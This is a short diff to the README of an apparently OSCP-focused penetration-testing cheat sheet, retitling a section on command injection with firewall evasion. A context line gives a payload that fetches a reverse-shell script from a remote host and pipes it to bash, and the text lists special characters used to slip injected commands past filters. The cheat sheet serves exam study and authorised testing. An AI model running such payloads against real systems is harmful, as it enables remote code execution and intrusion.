Desm0ndChan/OSCP-cheatsheet/README.md

 Then on the server side, use `curl http://IP/rev.sh | bash` or similar tool as your injection payload.

-### Command injection payload choices
+### Command injection payload with firewall evasion
-Sometimes an application might have firewall or defences in-place, it means some special characters might be blocked.
+Sometimes an application might have firewall or defences in-place as a filter, it means some special characters might be blocked.
 Common command injection special characters are `;"|'&$`